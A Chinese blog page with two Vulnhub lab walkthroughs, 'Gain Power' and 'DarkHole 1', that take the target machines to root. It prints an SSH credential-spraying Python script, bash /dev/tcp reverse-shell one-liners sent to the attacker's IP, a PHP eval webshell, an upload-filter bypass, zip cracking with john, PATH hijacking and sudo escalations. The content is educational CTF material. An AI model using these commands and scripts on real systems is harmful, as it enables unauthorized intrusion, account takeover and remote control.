Vulnhub之Gain Power靶机详细测试过程
Posted Jason_huawen
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Vulnhub之Gain Power靶机详细测试过程相关的知识,希望对你有一定的参考价值。
Gain Power
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
192.168.56.100 08:00:27:a1:99:30 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:57:a3:c2 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 09:14 EDT
Nmap scan report for bogon (192.168.56.254)
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 88416111e11f187dd60c38292579162c (RSA)
| 256 18c5fdcecd2b92f8d9171721249d67df (ECDSA)
|_ 256 84c514e4e93321416a9272b9a7331aea (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
|_http-title: Watch shop | eCommers
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
8000/tcp open http Ajenti http control panel
|_http-title: Ajenti
MAC Address: 08:00:27:57:A3:C2 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.86 seconds
NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、8000(http)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ nikto -h http://192.168.56.254/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.254
+ Target Hostname: 192.168.56.254
+ Target Port: 80
+ Start Time: 2023-05-01 09:17:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-05-01 09:18:38 (GMT-4) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
nikto工具扫描出目录/secret,访问该目录,将该目录下的图片文件下载到Kali Linux本地进行分析。
但是图片分析没有得到任何有意的结果。
└─$ ssh root@192.168.56.254
The authenticity of host \'192.168.56.254 (192.168.56.254)\' can\'t be established.
ED25519 key fingerprint is SHA256:1yR5iTL+oNBeYI7ACvh1p8CYWHrzXAiOC+CSijIO9uQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added \'192.168.56.254\' (ED25519) to the list of known hosts.
Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :)
___ _ ___
/ __|__ _(_)_ _ | _ \\_____ __ _____ _ _
| (_ / _` | | \' \\ | _/ _ \\ V V / -_) \'_|
\\___\\__,_|_|_||_| |_| \\___/\\_/\\_/\\___|_|
I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)
I already told the format of password of everyone in the yesterday\'s metting.
Now i have configured everything. My request is to everyone to Complete assignments on time
btw one of my employee have sudo powers because he is my favourite
NOTE : "This message will automatically removed after 2 days"
- BOSS
root@192.168.56.254\'s password:
假设用户名为employee1,根据作者提示,可能密码与用户名有一定规律,比如跟用户名相同
从home家目录来看有coworker, helper,以及employee,而只有其中一个employee有sudo 权限,因此需要编写脚本找出哪个employee有sudo 权限
import paramiko
import sys
import time
class GainPowerCls:
def __init__(self) -> None:
self.host = \'192.168.56.254\' # IP address of the virtual machine(target)
print("Target: %s" % self.host)
try:
self.ssh_client = paramiko.SSHClient()
self.ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
except Exception as e:
print("Something is wrong: %s" % e)
sys.exit()
def run_sudo(self,username, password):
try:
print(\'Attempt to access by %s: %s\' % (username, password))
self.ssh_client.connect(hostname=self.host,username=username, password=password)
transport = self.ssh_client.get_transport()
# Return the underlying .Transport object for this SSH connection. This can be used to perform lower-level tasks, like opening specific kinds of channels.
session = transport.open_session()
# Request a new channel to the server, of type "session". This is just an alias for calling open_channel with an argument of "session"
session.set_combine_stderr(True)
# Set whether stderr should be combined into stdout on this channel. The default is False, but in some cases it may be convenient to have both streams combined.
session.get_pty()
#Request a pseudo-terminal from the server. This is usually used right after creating a client channel, to ask the server to provide some basic terminal semantics for a shell invoked with invoke_shell. It isn\'t necessary (or desirable) to call this method if you\'re going to execute a single command with exec_command.
session.exec_command(\'sudo -l\')
stdin = session.makefile(\'wb\',-1)
stdout = session.makefile(\'rb\',-1)
stdin.write(password+\'\\n\')
stdin.flush()
print(stdout.read().decode(\'utf-8\'))
session.close()
self.ssh_client.close()
except Exception as e:
print(e)
sys.exit()
def run(self):
for i in range(1,101):
username = \'employee\' + str(i)
password = \'employee\' + str(i)
self.run_sudo(username, password)
print(\'*\'*150)
time.sleep(1)
if __name__ == \'__main__\':
client = GainPowerCls()
client.run()
运行上述python脚本可知employee64拥有sudo 权限
employee64
[sudo] password for employee64:
Matching Defaults entries for employee64 on localhost:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\\:/bin\\:/usr/sbin\\:/usr/bin
User employee64 may run the following commands on localhost:
(programmer) /usr/bin/unshare
******************************************************************************************************************************************************
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ ssh employee64@192.168.56.254
Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :)
___ _ ___
/ __|__ _(_)_ _ | _ \\_____ __ _____ _ _
| (_ / _` | | \' \\ | _/ _ \\ V V / -_) \'_|
\\___\\__,_|_|_||_| |_| \\___/\\_/\\_/\\___|_|
I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)
I already told the format of password of everyone in the yesterday\'s metting.
Now i have configured everything. My request is to everyone to Complete assignments on time
btw one of my employee have sudo powers because he is my favourite
NOTE : "This message will automatically removed after 2 days"
- BOSS
employee64@192.168.56.254\'s password:
Permission denied, please try again.
employee64@192.168.56.254\'s password:
Last failed login: Mon May 1 22:34:48 EDT 2023 from 192.168.56.206 on ssh:notty
There was 1 failed login attempt since the last successful login.
Last login: Mon May 1 22:30:52 2023 from 192.168.56.206
[employee64@localhost ~]$ id
uid=1063(employee64) gid=1063(employee64) groups=1063(employee64) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
通过unshare执行不同的命名空间的bash从而得到programmer的shell
[employee64@localhost ~]$ sudo -u programmer /usr/bin/unshare /bin/bash
[sudo] password for employee64:
bash-4.2$ id
uid=1182(programmer) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
bash-4.2$
这样我们就得到了programmer的shell
bash-4.2$ pwd
/media/programmer/scripts
bash-4.2$ cat backup.sh
#!/bin/bash
cp /var/www/html/thisiscarddetails.txt /tmp/back.txt
在/media/programmer/scripts有脚本,会被定期执行
将pspy64工具上传至目标主机的/tmp目录
bash-4.2$ cd /tmp
bash-4.2$ wget http://192.168.56.206:8000/pspy64
--2023-05-01 22:42:29-- http://192.168.56.206:8000/pspy64
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
100%[====================================================================================>] 3,104,768 --.-K/s in 0.01s
2023-05-01 22:42:29 (235 MB/s) - ‘pspy64’ saved [3104768/3104768]
bash-4.2$ chmod +x pspy64
2023/05/01 22:44:01 CMD: UID=1183 PID=25118 | /bin/bash /media/programmer/scripts/backup.sh
可知backup.sh会被UID为1183的用户定期执行
查看/etc/passwd文件可知UID为1183的用户为vanshal
bash-4.2$ ls -alh
total 4.0K
drwxr-xr-x. 2 programmer prome 23 May 18 2020 .
drwxrwx---. 3 programmer prome 21 Aug 8 2019 ..
-rwxr-xr-x. 1 programmer prome 65 May 18 2020 backup.sh
programmer用户对backup.sh脚本有修改权限
bash-4.2$ echo \'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1\' >> backup.sh
──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 51130
bash: no job control in this shell
[vanshal@localhost ~]$ id
id
uid=1183(vanshal) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
You have mail in /var/mail/vanshal
稍微等会就可以得到vanshal的shell
[vanshal@localhost ~]$ cat loc
cat local.txt
░██████╗░░█████╗░██╗███╗░░██╗ ██████╗░░█████╗░░██╗░░░░░░░██╗███████╗██████╗░
██╔════╝░██╔══██╗██║████╗░██║ ██╔══██╗██╔══██╗░██║░░██╗░░██║██╔════╝██╔══██╗
██║░░██╗░███████║██║██╔██╗██║ ██████╔╝██║░░██║░╚██╗████╗██╔╝█████╗░░██████╔╝
██║░░╚██╗██╔══██║██║██║╚████║ ██╔═══╝░██║░░██║░░████╔═████║░██╔══╝░░██╔══██╗
╚██████╔╝██║░░██║██║██║░╚███║ ██║░░░░░╚█████╔╝░░╚██╔╝░╚██╔╝░███████╗██║░░██║
░╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝ ╚═╝░░░░░░╚════╝░░░░╚═╝░░░╚═╝░░╚══════╝╚═╝░░╚═╝
You successfully owned the user of this box :-) Best of Luck for the root
flag: 5c2a29d7b95868da9e503502f301e8dd
Twitter : VanshalG
得到了用户flag
家目录下有文件secret.zip,将其下载到Kali Linux本地
──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ wget http://192.168.56.254:9999/secret.zip
--2023-05-01 22:52:19-- http://192.168.56.254:9999/secret.zip
Connecting to 192.168.56.254:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 439 [application/zip]
Saving to: ‘secret.zip’
secret.zip 100%[=====================================================>] 439 --.-KB/s in 0s
2023-05-01 22:52:19 (1.52 MB/s) - ‘secret.zip’ saved [439/439]
──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ unzip secret.zip
Archive: secret.zip
[secret.zip] Mypasswords.txt password:
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ zip2john secret.zip > secret_hash
ver 2.0 efh 5455 efh 7875 secret.zip/Mypasswords.txt PKZIP Encr: TS_chk, cmplen=243, decmplen=257, crc=BC7A971B ts=7F46 cs=7f46 type=8
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt secret_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press \'q\' or Ctrl-C to abort, almost any other key for status
81237900 (secret.zip/Mypasswords.txt)
1g 0:00:00:00 DONE (2023-05-01 22:53) 6.250g/s 4480Kp/s 4480Kc/s 4480KC/s AnThOnY..741210
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
破解得到了文件的密码
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ unzip secret.zip
Archive: secret.zip
[secret.zip] Mypasswords.txt password:
inflating: Mypasswords.txt
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ cat Mypasswords.txt
aTQ!vYxQUh3$&uaN3p%@_ax#Ab2XNZ!5$rFh$@bDMyxt#&Q2L&4+DvDT?A!MPKK9sFq-V8_d$5gQLKyKhf-4&S=_m^Cx?bZYf8Bv%%*H^GcvDc4ayfPk^HWs8bnD%Ayk3$5WP6_K?a6_%MF&e-DS2ZZ$m93BL3CY!huQDM2-JZcMSMKT8K*Z7zLPGATU7JP&x#JtaZHAbM^%$TK%C3ubXV4#e87M6P-puXTTMbzuP5y4qX6Uzd%ed8Ux_vMX=pCB
用上述密码可以成功访问8000端口,用户名为root
有webshell,可以运行任何命令
bash -i >& /dev/tcp/192.168.56.206/8888 0>&1
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo nc -nlvp 8888
[sudo] password for kali:
listening on [any] 8888 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 45550
[root@localhost /]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[root@localhost /]# cd /root
cd /root
[root@localhost root]# ls -alh
ls -alh
total 28K
dr-xr-x---. 3 root root 132 Jun 21 2020 .
dr-xr-xr-x. 18 root root 240 Aug 7 2019 ..
-rw-r--r--. 1 root root 18 Dec 28 2013 .bash_logout
-rw-r--r--. 1 root root 176 Dec 28 2013 .bash_profile
-rw-r--r--. 1 root root 176 Dec 28 2013 .bashrc
-rw-r--r--. 1 root root 100 Dec 28 2013 .cshrc
drwxr-----. 3 root root 19 Aug 7 2019 .pki
-rw-r--r--. 1 root root 2.1K May 18 2020 proof.txt
-rw-------. 1 root root 1.0K Aug 7 2019 .rnd
-rw-r--r--. 1 root root 129 Dec 28 2013 .tcshrc
[root@localhost root]# cat proof.txt
cat proof.txt
░██████╗░░█████╗░██╗███╗░░██╗ ██████╗░░█████╗░░██╗░░░░░░░██╗███████╗██████╗░
██╔════╝░██╔══██╗██║████╗░██║ ██╔══██╗██╔══██╗░██║░░██╗░░██║██╔════╝██╔══██╗
██║░░██╗░███████║██║██╔██╗██║ ██████╔╝██║░░██║░╚██╗████╗██╔╝█████╗░░██████╔╝
██║░░╚██╗██╔══██║██║██║╚████║ ██╔═══╝░██║░░██║░░████╔═████║░██╔══╝░░██╔══██╗
╚██████╔╝██║░░██║██║██║░╚███║ ██║░░░░░╚█████╔╝░░╚██╔╝░╚██╔╝░███████╗██║░░██║
░╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝ ╚═╝░░░░░░╚════╝░░░░╚═╝░░░╚═╝░░╚══════╝╚═╝░░╚═╝
_________ __ .__ __ .__
\\_ ___ \\ ____ ____ ________________ _/ |_ __ __| | _____ _/ |_|__| ____ ____
/ \\ \\/ / _ \\ / \\ / ___\\_ __ \\__ \\\\ __\\ | \\ | \\__ \\\\ __\\ |/ _ \\ / \\
\\ \\___( <_> ) | \\/ /_/ > | \\// __ \\| | | | / |__/ __ \\| | | ( <_> ) | \\
\\______ /\\____/|___| /\\___ /|__| (____ /__| |____/|____(____ /__| |__|\\____/|___| /
\\/ \\//_____/ \\/ \\/ \\/
You successfully owned the root of this box :-)
Flag: eb2e174c3883ff6b5fd871167795b4d6
Twitter : VanshalG
[root@localhost root]#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
Vulnhub之DARKHOLE: 1渗透测试
1、靶机概述
Description
Difficulty: Easy
It’s a box for beginners, but not easy, Good Luck
Hint: Don’t waste your time For Brute-Force
链接: 靶机下载地址.
KALI:192.168.110.128
靶机:192.168.110.136
2、信息收集
首先把靶机的IP给扫出来
接着扫描一波端口和服务
靶机开启22和80端口,毫无疑问,先访问一下80端口,显示为一个站点。
查看页面和审计页面源码,并没有发现关键信息。
点击login,进入登录页面
靶机描述中已经告诉我们不要使用暴力破解,不过可以注册一个账号。点击sign up now,然后注册一个账号(test01:123456)。
注册成功后,登录进去系统。
仅有更新个人信息和密码功能。
3、越权操作
更新一下密码,并使用BP抓包。
尝试是否存在越权操作漏洞,修改参数id=1
事实证明,存在越权操作漏洞,且我们已经修改了id=1的账户(admin)的密码为111111。
使用管理员账户(admin:111111)登录系统,多了一个文件上传功能。
4、文件上传获取shell
首先上传一个php文件,内容为
<?php @eval($_POST[cmd]);?)>
但是报错了,猜测做了黑名单检测。
将后缀名改为.phtml,再次上传,上传成功,且暴露了上传路径。
使用蚁剑连接,获取到shell
5、反弹shell至kali
下一步,我们反弹shell至kali
新建文件xxx.sh,并赋予执行权限,内容为
#!/bin/bash
bash -i >& /dev/tcp/192.168.110.128/7788 0>&1
kali上开启nc监听,在蚁剑终端执行xxx.sh,反弹shell成功。
目前,我们获得的权限还比较低,下一步,开始提权
查看/etc/passwd,可知,我们要先提权到john或darkhole
在/var/www/html/config目录下存在数据库连接文件
在/home/john目录下发现toto二进制文件具有s权限
这个toto文件是"id"的副本文件,运行发现toto文件的结果是用john的身份执行了id命令
6、获取john用户shell
我们可以尝试利用这个特性,在本地编辑新的id文件,写入/bin/bash,给执行权限。然后将文件路径写入到原有环境变量前(从前往后顺序匹配),这样使用id命令时就会优先匹配此路径下的id文件,运行toto文件使用john身份调用id命令时就会获得shell
echo '/bin/bash' > /tmp/id;chmod +x /tmp/id;export PATH=/tmp:$PATH
在user.txt中找到flag,在password中找到密码root123
登录john账户
7、获取root权限
下一步,就是提权到root,首先搜一下具有sodo权限的命令
用户可以编辑并执行root权限的python 脚本。
那我们将获取shell的命令加入到python脚本中再去执行就可以获得root权限了
echo 'import os;os.system("/bin/bash")' > file.py
sudo python3 /home/john/file.py
以上是关于Vulnhub之Gain Power靶机详细测试过程的主要内容,如果未能解决你的问题,请参考以下文章
Vulnhub之Hacksudo Thor靶机详细测试过程(提权成功)
Vulnhub之Hacksudo Fog靶机详细测试过程(不同的方法)